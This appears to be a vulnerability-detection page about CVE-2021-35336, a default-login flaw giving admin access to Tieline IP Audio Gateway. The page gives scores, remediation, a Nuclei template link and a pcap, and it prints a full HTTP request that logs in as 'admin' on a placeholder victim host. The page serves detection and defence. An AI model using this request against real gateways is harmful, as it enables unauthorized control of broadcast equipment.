🔙 목록으로 돌아가기

CVE-2021-35336: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access

TitleTieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access
AuthorPratik Khalane
SeverityCritical
ImpactAn attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.
RemediationUpgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.
CVSS Score9.8
EPSS Score0.88398
CVE IDCVE-2021-35336
CWE IDCWE-1188
Tags cve2021 cve tieline default-login vuln

🔍 Vulnerability Description

Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.

🌐 HTTP Request

GET /api/get_device_details HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Authorization: Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"
Referer: http://www.victim.com/assets/base/home.html
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-35336.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-35336.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A